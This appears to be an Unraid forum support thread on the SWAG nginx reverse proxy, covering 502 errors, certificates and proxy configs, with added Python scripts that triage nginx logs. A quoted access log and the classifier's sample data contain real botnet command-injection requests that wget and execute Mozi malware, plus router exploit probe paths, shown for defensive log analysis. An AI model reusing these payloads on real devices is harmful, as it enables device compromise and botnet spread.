[Support] Linuxserver.io - SWAG - Secure Web Application Gateway (Nginx/PHP/Certbot/Fail2ban)


5 hours ago, alexandru360 said:

Nope ... I backed up all my configs, reset everything to default, cloned only deluge[...].conf and restarted swag and for subdomains I get Bad Gateway ... If someone has an idea I'll be all eyes ...

Just a thought: 
I saw on another thread here a response from 2019 that Nerd Pack might interfere with swag "mojo" ... is this still the case?

Any luck sorting this out???

3 hours ago, alexandru360 said:

I uninstalled Nerd Tools ... deleted SWAG completely and reinstalled, made all the configurations again and still Bad Gateway ... but the main domain works ... I am confused ... I think I have to investigate what Bad Gateway means for Nginx

It means nginx can't connect to the service. So you either have the name/IP/port wrong or not in the same custom bridge as nginx.

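A way to tell those three causes apart from SWAG's own logs, as an added example that is not from the thread or from the SWAG project: every 502 nginx serves is preceded by an upstream error line in error.log, and the wording of that line says whether the name did not resolve (app not on SWAG's custom bridge, or $upstream_app misspelled), the host refused the connection (wrong port, or the app is down) or nothing answered at all (wrong IP). The script assumes SWAG's default log path, /config/log/nginx/error.log (/mnt/user/appdata/swag/log/nginx/error.log on Unraid), and falls back to constructed sample lines in nginx's error-log format, with documentation-range client IPs, when that file is not present.

```python
"""Triage nginx 502 Bad Gateway causes from SWAG's error.log (added example)."""
import os
import re
import sys
from typing import Optional

LOG_PATH = "/config/log/nginx/error.log"  # assumed SWAG default; pass another path as argv[1]

# The text between the request counter ("*7") and ", client:" is nginx's upstream failure message.
ERROR_RE = re.compile(r"\[error\] \d+#\d+: \*\d+ (?P<msg>.*?), client: ")
SERVER_RE = re.compile(r"server: (?P<server>[^,]+),")
UPSTREAM_RE = re.compile(r'upstream: "(?P<upstream>[^"]+)"')
# With proxy_pass on a variable (SWAG's $upstream_app) nginx uses its resolver and logs
# "<name> could not be resolved (3: Host not found)" when the name is unknown on its network.
RESOLVE_RE = re.compile(r"^(?P<name>\S+) could not be resolved \(")

HINTS = {
    "unresolved": "name does not resolve from inside SWAG: the app is not on the same "
                  "custom bridge network, or $upstream_app is misspelled",
    "refused": "host answered but nothing listens on that port: wrong $upstream_port, "
               "or the app is down",
    "unreachable": "no answer from that IP at all: wrong IP, or a network SWAG cannot reach",
}

# Constructed sample lines (not real log data); server names taken from the thread.
SAMPLE_LOG = [
    '2021/01/28 10:01:02 [error] 415#415: *7 deluge could not be resolved (3: Host not found), '
    'client: 203.0.113.10, server: deluge.*, request: "GET / HTTP/2.0", host: "deluge.example.com"',
    '2021/01/28 10:01:05 [error] 415#415: *9 connect() failed (111: Connection refused) while '
    'connecting to upstream, client: 203.0.113.10, server: nextcloud.*, request: "GET / HTTP/2.0", '
    'upstream: "http://172.18.0.4:8080/", host: "nextcloud.example.com"',
    '2021/01/28 10:01:30 [error] 415#415: *12 connect() failed (113: No route to host) while '
    'connecting to upstream, client: 203.0.113.10, server: print.*, request: "GET / HTTP/1.1", '
    'upstream: "http://192.168.2.13:80/", host: "print.example.com"',
    '2021/01/28 10:02:00 [error] 415#415: *15 upstream timed out (110: Connection timed out) '
    'while connecting to upstream, client: 203.0.113.10, server: vm1.*, request: "GET / HTTP/2.0", '
    'upstream: "http://192.168.2.99:8080/", host: "vm1.example.com"',
    '2021/01/28 10:02:10 [notice] 415#415: signal process started',
]


def diagnose(line: str) -> Optional[dict]:
    """Map one error.log line to the 502 cause it points at, or None if it is not an upstream error."""
    m = ERROR_RE.search(line)
    if not m:
        return None
    msg = m.group("msg")
    server = SERVER_RE.search(line)
    upstream = UPSTREAM_RE.search(line)
    target = upstream.group("upstream") if upstream else "?"
    resolve = RESOLVE_RE.match(msg)
    if resolve:
        cause, target = "unresolved", resolve.group("name")
    elif "Connection refused" in msg:
        cause = "refused"
    elif "No route to host" in msg or "timed out" in msg:
        cause = "unreachable"
    else:
        cause = "other"
    return {
        "server": server.group("server") if server else "?",
        "target": target,
        "cause": cause,
        "hint": HINTS.get(cause, msg),
    }


def triage(lines):
    """One diagnosis per upstream error line, in log order."""
    return [d for d in (diagnose(line) for line in lines) if d is not None]


def main(path: str = LOG_PATH) -> None:
    if os.path.exists(path):
        with open(path, encoding="utf-8", errors="replace") as fh:
            results = triage(fh)
    else:
        results = triage(SAMPLE_LOG)  # no log at that path: demonstrate on the sample
    for d in results:
        print(f"{d['server']:<12} -> {d['target']:<28} {d['cause']:<11} {d['hint']}")


if __name__ == "__main__":
    main(sys.argv[1] if len(sys.argv) > 1 else LOG_PATH)
```

Run it inside the container (`docker exec swag python3 triage.py`) or against the appdata copy of the log; the "unresolved" case is the one to look at first when only subdomains fail, since it means SWAG cannot even find the container by name.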

Hi all, I replaced my cache drives the other day and found when I turned dockers back on that nothing was listed at all. So I added back in my templates and that seemed to work just fine, save my swag docker.

Long story short, I ended up renaming the entire /config folder (which was a LONG time in use from very early letsencrypt days) and seeing if a complete reinstall worked. Got caught with the rate limit of letsencrypt. Is there a way I can move over the certs that were generated in the old /config structure? Thanks!

RESOLVED:  In case anyone comes across this I came across a thread about CA Backup/Restore and completely forgot the app was running on my system.  Did a restore of everything and it's working perfectly now.

Edited by talmania
1 hour ago, saarg said:

For what? This container handles getting the certs.

I want to use Swag with Cloudflare in Full (strict).

When I enable Full (strict), I get Invalid SSL certificate.

Any idea how to fix that?

[image: Screen Shot 2021-01-27 at 7.05.54 PM.png]

Edited by Moka

Does anyone know if it's possible to use SWAG and point it to a VM, not to a docker container at all?

Looking at the sample configuration, it seems all the info is pointing to a docker container. Is it possible to have it point to a VM instead for hosting other non-docker applications?

Is it even possible or does this only work for containers?

1 hour ago, brent3000 said:

Does anyone know if it's possible to use SWAG and point it to a VM, not to a docker container at all?

Looking at the sample configuration, it seems all the info is pointing to a docker container. Is it possible to have it point to a VM instead for hosting other non-docker applications?

Is it even possible or does this only work for containers?

Not entirely sure what you mean, but I reverse proxy sites on multiple VMs and containers on a second unraid using a single instance of swag. It all depends on how your network is set up. If you can access the site using a LAN IP and port in a web browser, you likely can reverse proxy it for WAN access.

2 minutes ago, jonathanm said:

but I reverse proxy sites on multiple vm's and containers on a second unraid using a single instance of swag.

This is what I'm after.

If I have a VM running a website (which is accessed via a local IP), what/how do I build a config or setup so SWAG will direct vm1.domain.com to the VM?

All the sample ones are container-based examples? Or do I just put the VM name in its place?

1 minute ago, brent3000 said:

This is what I'm after.

If I have a VM running a website (which is accessed via a local IP), what/how do I build a config or setup so SWAG will direct vm1.domain.com to the VM?

All the sample ones are container-based examples? Or do I just put the VM name in its place?

I don't use the samples, I just set things up like a normal nginx install. I learned from tutorials I searched in Google. My personal preference is to keep my sites all in one main config file, with common blocks for repeated lines defined in other config files I reference. My install doesn't follow the included examples.

17 hours ago, Moka said:

I want to use Swag with Cloudflare in Full (strict).

When I enable Full (strict), I get Invalid SSL certificate.

Any idea how to fix that?

[image: Screen Shot 2021-01-27 at 7.05.54 PM.png]

I don't know what full mode is, but if you need to use certs you get from cloudflare, then I don't think it's possible with swag.

Join our discord and you can ask there, as there are more people with more knowledge about swag.


Hi guys, I hope someone can help me with this because I've been banging my head against a wall for hours trying to figure out what is going wrong:

I followed Spaceinvader One's video on setting up a reverse proxy in unraid, but whenever I attempt to go to any of the addresses that should be pointed to my docker containers I end up at the SWAG landing page ("Welcome to your SWAG instance"). Any thoughts?

I really hope it is something obvious, but I've a bad feeling it isn't ... Please probe if I haven't given enough information.

On 2/1/2020 at 6:03 AM, Coolsaber57 said:

I am trying to expose my Octoprint page, but am having trouble finding a configuration that will work.

Here's the examples that Octoprint provides: https://community.octoprint.org/t/reverse-proxy-configuration-examples/1107

Here's my current config:

server {
    listen 443 ssl;
    listen [::]:443 ssl;

    # Matches print.<any domain the cert covers>
    server_name print.*;

    include /config/nginx/ssl.conf;

    # No request-body limit, so large .gcode uploads are not cut off by nginx
    client_max_body_size 0;

    location / {
        include /config/nginx/proxy.conf;
        # OctoPrint runs on a separate LAN host, so proxy_pass uses its IP and port,
        # not a container name on the docker bridge
        proxy_pass http://192.168.2.13:80;
        proxy_set_header Host $http_host;
        # The SockJS/WebSocket connection OctoPrint's UI uses needs HTTP/1.1 to the
        # backend plus the Upgrade/Connection headers (SWAG's proxy.conf also sets
        # proxy_http_version; repeating it here keeps the block self-contained)
        proxy_http_version 1.1;
        proxy_set_header Upgrade $http_upgrade;
        proxy_set_header Connection "upgrade";
        proxy_set_header X-Real-IP $remote_addr;
        proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
        # OctoPrint reads X-Scheme to build https:// links when it sits behind a proxy
        proxy_set_header X-Scheme $scheme;
    }
}

I took out a few lines that were causing the docker container to throw errors. I'm currently getting a 500 error. If I copy a config from another container and change the IP/port/subdomain, I do actually get to see the login page, but it says it's offline and asks me to reconnect.

Has anyone successfully configured Octoprint in this container? If so, would you be able to share the config?

In the following 50 pages, it seems that there is still no solution to this? (I'm running into the same problem)

On 1/30/2021 at 4:32 AM, SockDust said:

I followed Spaceinvader One's video on setting up a reverse proxy in unraid, but whenever I attempt to go to any of the addresses that should be pointed to my docker containers I end up at the SWAG landing page ("Welcome to your SWAG instance"). Any thoughts?

Is there a specific app you are trying to route to? I also followed SI's YouTube video and it worked a treat. Have you checked the log that the domain is clearing correctly, or what method are you using (folder or domain level)?


Hi all,

Over the weekend I set up swag and nextcloud, following spaceinvaderone's guides (https://scan.nextcloud.com/ gives all A+). I got everything working using my own domain (nexcloud.mydomain.com). I'm not a specialist, so I'm not very confident about the security. So, I decided to let it run for about 20 hrs, then check the logs and enter the IPs on abuseipdb.com. I filtered all my activities out and am left with 158 lines in the nginx log. Here is an example:

https://www.abuseipdb.com/check/74.120.14.53
https://www.abuseipdb.com/check/180.163.220.5
https://www.abuseipdb.com/check/180.163.220.68
https://www.abuseipdb.com/check/27.115.124.70
https://www.abuseipdb.com/check/192.241.215.11

Next some lines, none of which are from my IPs.

I understand the GET background, logo, etc. But kerbynet and wget from some IP don't sound good.

GET / HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
POST /GponForm/diag_Form?images/ HTTP/1.1
/tmp/gpon80&ipv=0
POST /boaform/admin/formLogin HTTP/1.1
 400 0 -
GET /portal/redlion HTTP/1.1
HEAD http://112.124.42.80:63435/ HTTP/1.1
CONNECT 112.124.42.80:443 HTTP/1.1
HEAD http://110.242.68.4/ HTTP/1.1
CONNECT 110.242.68.4:443 HTTP/1.1
POST /HNAP1/ HTTP/1.0
\x16\x03\x01\x00\x8B\x01\x00\x00\x87\x03\x03\x11\xDFJ\x5CN\x8F\xA0\x89[\x9A\x84i=\x8A\x8FA\xEB\x98\xE3\xDB\xFDQ\xD1Iw\xFD\xED
HEAD /robots.txt HTTP/1.0
GET /login HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.229.54.251:50078/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0
GET /actuator/health HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
OPTIONS / HTTP/1.1
HEAD /epa/scripts/win/nsepa_setup.exe HTTP/1.1
HEAD / HTTP/1.0
GET /cgi-bin/kerbynet?Action=Render&Object=StartSession HTTP/1.1
@\x00\x00\x00y0\x12\xD9\x9E9Q\x90\x8A\xED\xEE`\xCC\xB3\xD6|
\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr
GET /hudson HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
GET /config/getuser?index=0 HTTP/1.1
GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1
GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.99.138.110:45592/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1
GET / HTTP/2.0 http://baidu.com/
GET /login HTTP/2.0 http://baidu.com/
GET / HTTP/2.0 
GET /login HTTP/2.0 
GET /apps/files_rightclick/css/app.css?v=46c85d58-8 HTTP/2.0
GET /core/css/guest.css?v=c3182750-8 HTTP/2.0
GET /apps/files_videoplayer/js/main.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/files_fileinfo.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/files_client.js?v=c3182750-8 HTTP/2.0
GET /apps/files_sharing/js/dist/main.js?v=c3182750-8 HTTP/2.0
GET /apps/files_pdfviewer/js/files_pdfviewer-public.js?v=c3182750-8 HTTP/2.0
GET /apps/files_rightclick/js/script.js?v=c3182750-8 HTTP/2.0
GET /apps/files_rightclick/js/files.js?v=c3182750-8 HTTP/2.0
GET /apps/theming/js/theming.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/main.js?v=c3182750-8 HTTP/2.0
GET /core/js/dist/login.js?v=c3182750-8 HTTP/2.0
GET /js/core/merged-template-prepend.js?v=c3182750-8 HTTP/2.0
GET /core/js/oc.js?v=c3182750 HTTP/2.0
GET /apps/theming/styles?v=8 HTTP/2.0
GET /apps/theming/image/logo?useSvg=1&v=8 HTTP/2.0
GET /apps/accessibility/css/user-a82fd95db10ff25dfad39f07372ebe37 HTTP/2.0
GET /core/img/actions/confirm-white.svg?v=2 HTTP/2.0
GET /core/img/loading-dark.gif HTTP/2.0
GET /core/img/actions/toggle.svg HTTP/2.0
GET /apps/theming/image/logo?v=8 HTTP/2.0
GET /csrftoken HTTP/2.0
GET /apps/theming/image/background?v=8 HTTP/2.0
GET /csrftoken HTTP/2.0
GET /apps/theming/favicon?v=8 HTTP/1.1
GET /csrftoken HTTP/2.0

Are there some obvious things I forgot to do?

Considering the IP locations, geo blocking wouldn't be a bad idea. I don't leave the country much, so blocking about the whole world except 2/3 countries would probably be an option.

Thanks,

edit: found something on geo blocking https://technicalramblings.com/blog/blocking-countries-with-geolite2-using-the-letsencrypt-docker-container/

Of course, running into issues, I'm missing something very obvious.

Edited by ZekerPixels
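One way to sort an excerpt like the one above into exploit attempts, software fingerprinting, proxy abuse, non-HTTP junk and legitimate Nextcloud traffic, as an added example that is not part of the thread or of SWAG. It parses nginx's default "combined" access-log format, which is what SWAG writes to /config/log/nginx/access.log. The log lines inside the block are constructed from the requests quoted above with documentation-range client IPs (the payload-hosting IPs inside the request strings are the ones from the excerpt); the per-path labels are best-effort descriptions of well-known probes, not confirmed attributions. The "hostile" set is what a fail2ban-style ban list would be built from.

```python
"""Classify request lines from SWAG's nginx access.log (added example)."""
import re
from collections import Counter, defaultdict

# nginx "combined" format: ip - user [time] "request" status bytes "referer" "agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)'
)
HTTP_METHODS = {"GET", "HEAD", "POST", "PUT", "DELETE", "OPTIONS", "PATCH", "CONNECT"}

# Paths from the excerpt that only exploit kits and botnets request (labels are best-effort).
EXPLOIT_PATHS = {
    "/GponForm/diag_Form": "GPON router command-injection probe",
    "/boaform/admin/formLogin": "router admin login probe (Boa web server)",
    "/setup.cgi": "Netgear setup.cgi command injection",
    "/shell": "JAWS DVR /shell command injection",
    "/HNAP1/": "HNAP (D-Link) probe",
    "/cgi-bin/kerbynet": "ZeroShell kerbynet command injection",
    "/config/getuser": "IP-camera credential-disclosure probe",
}
# Paths that merely fingerprint software this host does not run.
FINGERPRINT_PATHS = {
    "/owa/auth/logon.aspx": "Exchange OWA",
    "/actuator/health": "Spring Boot actuator",
    "/hudson": "Jenkins/Hudson",
    "/epa/scripts/win/nsepa_setup.exe": "Citrix Gateway",
    "/portal/redlion": "Red Lion HMI",
}
# Nextcloud's own UI lives under these prefixes on this host (assumption: Nextcloud at /).
APP_PREFIXES = ("/apps/", "/core/", "/js/", "/csrftoken", "/login", "/index.php", "/remote.php")
# Injected shell in the query string fetching and running a payload (the Mozi hits above).
PAYLOAD_RE = re.compile(r"(wget|curl|tftp)\+|;sh\b|chmod\+777", re.I)

# Constructed sample in combined format; requests are the ones quoted in the thread.
SAMPLE_LOG = [
    r'198.51.100.7 - - [02/Feb/2021:03:14:01 +0100] "GET /config/getuser?index=0 HTTP/1.1" 404 162 "-" "-"',
    r'198.51.100.7 - - [02/Feb/2021:03:14:02 +0100] "POST /GponForm/diag_Form?images/ HTTP/1.1" 404 162 "-" "-"',
    r'198.51.100.22 - - [02/Feb/2021:04:02:11 +0100] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.229.54.251:50078/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 162 "-" "-"',
    r'198.51.100.22 - - [02/Feb/2021:04:02:12 +0100] "GET /shell?cd+/tmp;rm+-rf+*;wget+http://59.99.138.110:45592/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1" 404 162 "-" "-"',
    r'198.51.100.40 - - [02/Feb/2021:05:30:00 +0100] "CONNECT 112.124.42.80:443 HTTP/1.1" 400 0 "-" "-"',
    r'198.51.100.40 - - [02/Feb/2021:05:30:01 +0100] "HEAD http://110.242.68.4/ HTTP/1.1" 400 0 "-" "-"',
    r'198.51.100.55 - - [02/Feb/2021:06:10:00 +0100] "\x16\x03\x01\x00\x8B\x01\x00\x00\x87\x03\x03" 400 157 "-" "-"',
    r'198.51.100.55 - - [02/Feb/2021:06:10:05 +0100] "\x03\x00\x00/*\xE0\x00\x00\x00\x00\x00Cookie: mstshash=Administr" 400 157 "-" "-"',
    r'198.51.100.61 - - [02/Feb/2021:07:00:00 +0100] "GET /cgi-bin/kerbynet?Action=Render&Object=StartSession HTTP/1.1" 404 162 "-" "-"',
    r'198.51.100.61 - - [02/Feb/2021:07:00:01 +0100] "GET /owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f HTTP/1.1" 404 162 "-" "-"',
    r'192.168.1.50 - - [02/Feb/2021:08:00:00 +0100] "GET /login HTTP/2.0" 200 5211 "-" "Mozilla/5.0"',
    r'192.168.1.50 - - [02/Feb/2021:08:00:01 +0100] "GET /apps/theming/favicon?v=8 HTTP/1.1" 200 1021 "-" "Mozilla/5.0"',
]


def classify(request: str) -> tuple:
    """Return (category, label) for one $request value exactly as nginx logged it."""
    # nginx escapes non-printable bytes as \xHH, so non-HTTP traffic on port 80 is recognisable.
    if request.startswith(r"\x16\x03"):
        return "non_http", "TLS ClientHello sent to the plaintext port"
    if "mstshash=" in request:
        return "non_http", "RDP connection request aimed at the web port"
    parts = request.split(" ")
    if parts[0] not in HTTP_METHODS or len(parts) < 2:
        return "non_http", "binary or malformed request line"
    method, target = parts[0], parts[1]
    if method == "CONNECT" or target.startswith(("http://", "https://")):
        return "proxy_abuse", "open-proxy test (CONNECT / absolute URI)"
    path = target.partition("?")[0]
    if path in EXPLOIT_PATHS:
        return "exploit", EXPLOIT_PATHS[path]
    if PAYLOAD_RE.search(target):
        return "exploit", "command injection fetching a payload"
    if path in FINGERPRINT_PATHS:
        return "fingerprint", FINGERPRINT_PATHS[path]
    if path in ("/", "/robots.txt") or path.startswith(APP_PREFIXES):
        return "app", "Nextcloud / root request"
    return "other", "unrecognised path"


def summarise(lines):
    """Per-IP category counts, plus the first label seen for each (ip, category)."""
    per_ip = defaultdict(Counter)
    labels = {}
    for line in lines:
        m = COMBINED_RE.match(line)
        if not m:
            continue
        cat, label = classify(m.group("request"))
        per_ip[m.group("ip")][cat] += 1
        labels.setdefault((m.group("ip"), cat), label)
    return per_ip, labels


def hostile_ips(lines, threshold: int = 1):
    """IPs with at least `threshold` exploit / proxy-abuse / non-HTTP hits: ban candidates."""
    per_ip, _ = summarise(lines)
    bad = ("exploit", "proxy_abuse", "non_http")
    return sorted(ip for ip, c in per_ip.items() if sum(c[k] for k in bad) >= threshold)


if __name__ == "__main__":
    per_ip, labels = summarise(SAMPLE_LOG)
    for ip in hostile_ips(SAMPLE_LOG):
        print(ip, dict(per_ip[ip]), labels.get((ip, "exploit"), ""))
```

Everything the script flags as hostile received a 4xx from nginx, which is the point: none of those paths exist on a SWAG/Nextcloud host, so the requests are noise unless a 200 ever shows up against one of them. The fingerprint hits (OWA, Jenkins, actuator) are the same scanners mapping the host and are worth counting but not worth alarm on their own.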

Hi. I was wondering if somebody could help me as I am getting a cert does not exist error. I've so far followed SpaceInvader One's YouTube video up to the point of setting up my DNS CNAME records, and forwarding my ports (see pictures below).

I am using Google Domains as my registrar. I am not using duckdns at all. I have a static IP. The red boxes in the picture are all mydomain.com and the purple box is my WAN IP.

[image: Capture.PNG]

If I try to RDP into my Windows machine using mydomain.com:3389 or www.mydomain.com:3389, which are both forwarded to my IP as "A" records, it works. If I try cloud.mydomain.com:3389 it just fails. Do I need to create an "A" record for cloud. and video. as well? I suppose there was a bit of a disconnect here since the video guide SpaceInvader One made talks about using DuckDNS, which I'm not using, and I'm guessing his duckdns config somehow has that set up already for him?

Here is my picture of my port forwarding on my router:

[image: Capture2.PNG]

Edit: I figured it out. In case anybody sees this in the future, you need to also forward your subdomains to your IP (which is basically creating A records for each, but through the forwarding options on Google Domains, rather than the custom resource records options), as well as making the CNAME records in the custom resource records options, which point to the main domain.

Edited by 007craft

On 2/2/2021 at 8:42 AM, ZekerPixels said:

I filtered all my activities out and am left with 158 lines in the nginx log

May I ask where you got this log data from? Just interested to see on mine also :)

My router is getting hit a lot by port scans etc. all landing on the webserver (80 and 443), but it's pretty normal sadly, just bots scanning IP ranges, trying a bunch of things and then moving on unless they get a hit.

9 hours ago, brent3000 said:

May I ask where you got this log data from? Just interested to see on mine also :)

My router is getting hit a lot by port scans etc. all landing on the webserver (80 and 443), but it's pretty normal sadly, just bots scanning IP ranges, trying a bunch of things and then moving on unless they get a hit.

Of course, it's in /appdata/swag/log/nginx/access.log

I understand the bot searching for something unsecured; as long as it's secured it doesn't really do anything. But I'm trying to understand what is happening and I want to be convinced it is secured before actually using it. And I really want to have geo blocking working, it doesn't hurt using it, and https://www.spamhaus.org/statistics/botnet-cc/ well, those get blocked.

But kerbynet, which I mentioned, turns out to be an old router exploit.

